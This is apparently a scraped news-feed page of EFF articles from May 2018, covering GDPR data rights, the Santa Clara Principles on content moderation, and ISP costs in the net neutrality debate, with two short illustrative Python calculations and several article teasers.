databases. You can also delete data that you don't want Twitter to keep using. That right of access also means that you can take your information with you. Under the GDPR, companies have to provide "data portability"—which means that they should provide you with your data in a way that lets you easily move it to a competing service – at least if you are in Europe. Again, some companies have already offered this ability. Google has offered "Google Takeout", Facebook its archive download feature, and Twitter its tweet archive. But their implementations have often been patchy and incomplete. Now more companies will provide these data dumps. The pre-existing services have already markedly improved. For users in the EU, they should also offer a way to truly and permanently delete your account and all its data. Still, these are the kind of user-empowering features that some companies would rather you didn't know too much about, so don't be surprised if the only news you hear about them comes from poring over these changes to long documents. As Buttarelli says, such "legal cover" might well be against the spirit of the GDPR, but it's going to take a while for companies, regulators, and privacy groups to establish what the law's sometimes ambiguous statements really mean. One particularly knotty problem is whether the language that many of these emails use ("by using our service, you agree to these terms") will be acceptable under the GDPR. The regulation is explicit that in many areas, you need to give informed, unambiguous consent by "a statement or clear affirmative action." 
Even more significantly, if the data being collected by a company isn't necessary for the service it is offering, under the GDPR the company should give covered users the option to decline that data collection, but still allow them to use the service. That's what the EDPS is complaining about when he says that some of these terms of service updates could be "travesties". If they are, you might find some more email updates in your inbox. And so could the companies sending them—from the EU's data protection regulators.
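On the fine ceiling mentioned earlier: under Article 83(5) of the GDPR, the maximum administrative fine for the most serious violations is 20 million euros or 4% of total worldwide annual turnover, whichever is higher. The short sketch below (in Python, with an invented revenue figure) shows why the 4% branch is the one large companies worry about.

    # GDPR Article 83(5): the fine ceiling is the higher of a flat 20 million euros
    # or 4% of total worldwide annual turnover. The revenue figure is illustrative.

    def gdpr_fine_ceiling(worldwide_annual_turnover_eur: float) -> float:
        return max(20_000_000, 0.04 * worldwide_annual_turnover_eur)

    # A hypothetical company with 2 billion euros in worldwide turnover:
    print(f"{gdpr_fine_ceiling(2_000_000_000):,.0f}")  # 80,000,000 -> the 4% branch applies

For a smaller company with, say, 100 million euros in turnover, 4% would only be 4 million euros, so the flat 20 million euro ceiling applies instead.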
>> mehr lesen

EFF and Coalition Partners Push Tech Companies To Be More Transparent and Accountable About Censoring User Content (Mo, 07 Mai 2018)
Groups Release Specific Guidelines Addressing Shoddy, Opaque Private Censorship Washington, D.C.—The Electronic Frontier Foundation (EFF) called on Facebook, Google, and other social media companies today to publicly report how many user posts they take down, provide users with detailed explanations about takedowns, and implement appeals policies to boost accountability. EFF, ACLU of Northern California, Center for Democracy & Technology, New America’s Open Technology Institute, and a group of academic experts and free expression advocates today released the Santa Clara Principles, a set of minimum standards for tech companies to augment and strengthen their content moderation policies. The detailed, plain-language guidelines call for disclosing not just how and why platforms are removing content, but how much speech is being censored. The principles are being released in conjunction with the second edition of the Content Moderation and Removal at Scale conference. Work on the principles began during the first conference, held in Santa Clara, California, in February. “Our goal is to ensure that enforcement of content guidelines is fair, transparent, proportional, and respectful of users’ rights,” said EFF Senior Staff Attorney Nate Cardozo. In the aftermath of violent protests in Charlottesville and elsewhere, social media platforms have faced increased calls to police content, shut down more accounts, and delete more posts. But in their quest to remove perceived hate speech, they have all too often wrongly removed perfectly legal and valuable speech. Paradoxically, marginalized groups have been especially hard hit by this increased policing, hurting their ability to use social media to publicize violence and oppression in their communities. And the processes used by tech companies are tremendously opaque. When speech is being censored by secret algorithms, without meaningful explanation, due process, or disclosure, no one wins. “Users deserve more transparency and greater accountability from platforms that play an outsized role—in Myanmar, Australia, Europe, and China, as well as in marginalized communities in the U.S. and elsewhere—in deciding what can be said on the Internet,” said Jillian C. York, EFF Director for International Freedom of Expression. “Users need to know why some language is allowed and the same language in a different post isn’t. They also deserve to know how their posts were flagged—did a government flag them, or were they flagged by the company itself? And we all deserve a chance to appeal decisions to block speech.” “The Santa Clara Principles are the product of years of effort by privacy advocates to push tech companies to provide users with more disclosure and a better understanding of how content policing works,” said Cardozo. “Facebook and Google have taken some steps recently to improve transparency, and we applaud that. But it’s not enough. 
We hope to see the companies embrace the Santa Clara Principles and move the bar on transparency and accountability even higher.” The three principles urge companies to: publish the number of posts removed and accounts permanently or temporarily suspended due to violations of their content guidelines; provide clear notice to all users about what types of content are prohibited, and clear notice to each affected user about the reason for the removal of their content or the suspension of their account; and provide human review of content removal by someone not involved in the initial decision, and enable users to engage in a meaningful and timely appeals process for any content removals or account suspensions. The Santa Clara Principles continue EFF’s work advocating for free expression online and greater transparency about content moderation. Since 2015 EFF has been collecting reports of online takedowns through its Onlinecensorship.org project, which shines a light on what content is taken down, why companies make certain decisions about content, and how content takedowns are affecting communities of users around the world. EFF’s annual Who Has Your Back report, which started in 2010, has revealed which companies are the best and worst at disclosing when they give users’ private information to the government. This year’s Who Has Your Back report will focus exclusively on private censorship issues. Future projects will examine transparency about content policing policies, with the Santa Clara Principles used as a benchmark for the minimum standards companies should have in place. “Content takedown and account deactivation practices can have a profound effect on the lives and work of individuals in different parts of the world,” said York, cofounder of Onlinecensorship.org. “The companies removing online speech should be up front about their content policing policies. Users are being kept in the dark, voices that should be heard are being silenced forever by automation, and that must change.” Santa Clara Principles participants: ACLU Foundation of Northern California Center for Democracy & Technology Electronic Frontier Foundation New America’s Open Technology Institute Irina Raicu (Markkula Center for Applied Ethics, Santa Clara University) Nicolas Suzor (Queensland University of Technology) Sarah T. Roberts (Department of Information Studies, School of Education & Information Studies, UCLA) Sarah Myers West (USC Annenberg School for Communication and Journalism) For the text of the principles: https://newamericadotorg.s3.amazonaws.com/documents/Santa_Clara_Principles.pdf For more on content moderation: https://www.eff.org/deeplinks/2018/01/private-censorship-not-best-way-fight-hate-or-defend-democracy-here-are-some Contact:  Nate Cardozo Senior Staff Attorney nate@eff.org Jillian C. York Director for International Freedom of Expression jillian@eff.org
>> mehr lesen

The Big Lie ISPs Are Spreading in State Legislatures Is That They Don’t Make Enough Money (Fr, 04 Mai 2018)
In their effort to prevent states from protecting a free and open Internet, a small handful of massive and extraordinarily profitable Internet service providers (ISPs) are telling state legislatures that network neutrality would hinder their ability to raise revenues to pay for upgrades and thus force them to charge consumers higher bills for Internet access. This is because state-based network neutrality will prohibit data discrimination schemes known as “paid prioritization,” where the ISP charges websites and applications new tolls and relegates those that do not pay to the slow lane. In essence, they are saying they have to charge new fees to websites and applications in order to pay for upgrades and maintenance to their networks. In other words, they claim that people are using so much of their broadband product that the ISPs cannot keep up on the revenue from our monthly subscriptions alone. Nothing could be further from the truth. Today in America we have ISPs that are already deploying 21st-century high-speed broadband without resorting to violating network neutrality or monetizing our personal information with advertisers. The fact is nothing—and certainly not a lack of funds—prevents incumbents from upgrading their networks and bringing a vast majority of the American cities they serve into the 21st century of Internet access. That means gigabit broadband services anywhere from $40 to $70 a month (the range people in the handful of competitive markets pay today). Yet, year after year, these ISPs have pocketed billions in profits, and it is not until they face competition from a rival provider that they upgrade their networks. Ultimately, it’s not network neutrality that prevents the large ISPs from upgrading their networks while lowering prices. It is a lack of incentive. The Biggest Cost For An ISP is the Initial Deployment, Not Internet Usage ISPs misrepresent to policymakers the true cost drivers of broadband deployment as a way to stave off pro-consumer protections. In fact, the biggest cost barrier to an ISP’s creation is the initial construction of the network (as opposed to its future upgrades) and the civil works that entails. That is what the Google Fiber deployment has taught us, and that is what studies in the European Union concluded when analyzing how to improve the market entry prospects of ISPs. Some estimates suggest the cost of deployment can be close to 80 percent of the entire cost portfolio of an ISP. Note that this means operations and maintenance of the network (which includes all of its customers’ broadband usage) could be as little as 20 percent of the ISP’s costs. This is acutely true when it comes to a fiber-to-the-home deployment, where the infrastructure (fiber optic cable) is effectively future-proof and can be upgraded cheaply with advances in electronics. It is worth remembering that our current incumbent telephone and cable companies have made back their initial investment costs because they entered the market as monopolies in the old days and likely enjoyed favorable financing as safe bets (nothing is safer to invest in than a monopoly). Our current incumbents enjoyed a litany of advantages for being the first to deploy. For example, many buildings were required, as they were constructed, to include telephone and cable lines, which in essence gave incumbents a virtually free path to customers that new entrants will not enjoy. 
This is also why it has been very hard to get new competition: new entrants have to navigate infrastructure deployment and rights-of-way from a very different position. As another example, when Google was deploying its fiber network in Austin, Texas, it needed to run its wires along the telephone pole system. Unfortunately for Google, AT&T owned many of those poles and simply denied it access to them entirely. This is a big reason why many small ISPs supported the FCC’s 2015 Open Internet Order: it guaranteed them rights to access infrastructure owned by an incumbent and prohibited by law the conduct AT&T exhibited in Austin, Texas. The World’s Fastest ISP Adheres to Network Neutrality and Privacy and Still Makes a Profit In addition to ISPs not needing huge new sums of money to upgrade and operate their networks, we have a case study showing that adhering to network neutrality principles, while also respecting user privacy by not monetizing their personal information, doesn’t prevent ISPs from making the money they need to deploy high-speed, affordable Internet. EPB Fiber Optics, a community broadband company run by Chattanooga, Tennessee, offers both gigabit and 10-gigabit broadband. A decade of their financial information, including how much they invest, how much the network costs, and how much profit they are making, is available here. Here is what the data demonstrates with regard to the scalability of fiber optic cable, and why ISPs are misleading policymakers when they assert that Internet usage or high-bandwidth applications drive their costs. At the launch of its gigabit broadband service in 2009, EPB started in the red, with capital expenditures (money spent on purchasing equipment and improving infrastructure) and operating expenses (maintaining and running the network) far above its revenue. But once it had about 35,000 customers, the network became profitable (all while following network neutrality and not monetizing the personal information of its customers). In the years that followed, the revenue gained from adding new customers far outpaced the maintenance costs and the money spent upgrading the network. It is almost impossible to detect the increased spending EPB underwent to upgrade to a 10-gigabit network in 2016. ISPs often blame companies like Netflix for driving their costs, yet there is no evidence that increased consumption by EPB’s customers resulted in an increase in costs that wasn’t already more than covered by its $50-$70 a month charge. If it were true that high-bandwidth applications imposed uniquely high costs on ISPs, then the revenue line would not keep outpacing the operating expenses line year after year as online video consumption grew; the two lines would be moving closer together (see the simplified sketch below). EPB is able to run a 21st-century ISP with the world’s fastest service on just 90,000 customers today, while following network neutrality and forgoing the extra profits from monetizing personal information like web browsing history. Meanwhile, Comcast sits on about 25 million customers and made $8.6 billion in profits for 2016 (and this was before Congress cut the corporate tax rates). At the same time, AT&T and Verizon each collected around $13 billion in profits for 2016. 
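To make that logic concrete, here is a deliberately simplified toy model of a deployment-heavy fiber ISP, with invented figures rather than EPB’s actual financials: one large build cost financed over time, small per-customer operating costs, and flat monthly revenue per subscriber. Once subscribers cover financing plus operations, every additional customer widens the gap between revenue and costs, which is why heavier usage does not pull the two lines back together.

    # Toy model of a fiber ISP's yearly economics. All figures are hypothetical
    # placeholders chosen to illustrate a deployment-heavy cost structure.

    ANNUAL_DEBT_SERVICE = 15_000_000   # yearly financing of the one-time network build
    OPEX_PER_CUSTOMER = 240            # yearly operations/maintenance per subscriber
    REVENUE_PER_CUSTOMER = 720         # e.g. $60/month for gigabit service

    def annual_margin(customers: int) -> int:
        revenue = customers * REVENUE_PER_CUSTOMER
        costs = ANNUAL_DEBT_SERVICE + customers * OPEX_PER_CUSTOMER
        return revenue - costs

    for customers in (10_000, 35_000, 90_000):
        print(f"{customers:>7,} customers -> yearly margin {annual_margin(customers):>12,}")
    # In this toy model the margin turns positive above roughly 31,000 customers and
    # keeps growing with each new subscriber, because per-customer costs stay small.

The real curves in EPB’s published financials are shaped by its actual capital spending and debt, but the underlying point is the same: once the network is built, usage is not the dominant cost.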
Charging Low Prices for Huge Amounts of Bandwidth Is Not Exclusively Reserved for Community Broadband Being able to provide affordable high-speed Internet at a profit while respecting network neutrality and user privacy is something the competitors to the incumbents have repeatedly demonstrated. Take regional provider Sonic as an example, and its Brentwood, California deployment, where the city’s infrastructure policies eliminated a majority of the costs of building the ISP. Right now Sonic sells gigabit broadband in the city of Brentwood at $40 a month, one of the lowest-priced offerings for gigabit service. Again, it is doing this at a profit, all while following network neutrality and protecting its customers’ privacy (Sonic regularly supports laws codifying these commitments as well). The provisioning of the service is not the expensive part of an ISP’s business, and the usage of Internet access is not an unsustainable cost driver. To properly diagnose the most efficient way to reduce ISP costs, one should look toward city planning and learn from Brentwood. The Sonic gigabit network came about because in 1999 the city adopted a building-code conduit requirement for all new development. The code required developers to install a 4-inch conduit pipe and then deed it back to the city. The policy goal at the time was to lay infrastructure with the hope of franchising a second cable television provider. However, no new cable company arrived, and the city came to own roughly 120 to 150 miles of unused conduit reaching 8,000 homes and commercial zones built since 1999. In response to the proposal by Sonic to utilize the infrastructure, the city issued a Request for Expression of Interest (RFEI) highlighting the available conduit to the companies Astound, AT&T, Comcast, Google, Level 3, Lit San Leandro, XO Communications, and Sonic. However, the only respondent to the RFEI was Sonic, so the city chose it to deploy the network. The agreement was lucrative enough that Sonic agreed to provide, among other things, free gigabit service to the local schools within the conduit network while still making money. We Already Pay More Than Enough to Get High-Speed, Affordable Internet Where Our Privacy is Protected and Net Neutrality is Preserved The fact is, more than half of Americans have only one choice for high-speed broadband, and the incumbents know they can rest on their legacy investments to maximize profits until they face competition from other broadband providers. They don’t have to make their service better or faster, because most of their customers have to choose between them and nothing. They worked so hard to repeal our privacy protections and net neutrality because, with so many of us lacking choice in the market, they can increase their profits while giving nothing to the consumer in return. No regulation banning paid prioritization has prevented them from upgrading their networks. We see this in both Chattanooga’s EPB and Brentwood’s Sonic, which operate perfectly well while following network neutrality and forgoing extra profits from monetizing our personal information. Net neutrality prevents ISPs from harming the competition they face from edge providers (particularly video providers that compete with television, such as Hulu, Netflix, and Amazon) and preserves the innovation benefits an open Internet yields. 
It also prohibits them from charging Internet services unjustified fees that would do nothing to improve the Internet but would do real harm to the free and open nature of the network we have enjoyed for decades.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 3, It's My Pancreas (Fr, 04 Mai 2018)
Kids are often the involuntary early adopters of controlling, abusive technology, whether that's school laptops that spy on them, location-tracking phone apps, or teenager-repelling buzzers that emit tones that adult ears can't hear. If you want to see your future, look at what we're doing to the kids.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 2, GlycemiControl (Fr, 04 Mai 2018)
Kids are often the involuntary early adopters of controlling, abusive technology, whether that's school laptops that spy on them, location-tracking phone apps, or teenager-repelling buzzers that emit tones that adult ears can't hear. If you want to see your future, look at what we're doing to the kids around you.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 1, SugarSafe (Fr, 04 Mai 2018)
As we move from having computers in our pockets to computers on our skin to computers inside our bodies, whether we use computers becomes less voluntary, and who gets to control those computers becomes more critical.
>> mehr lesen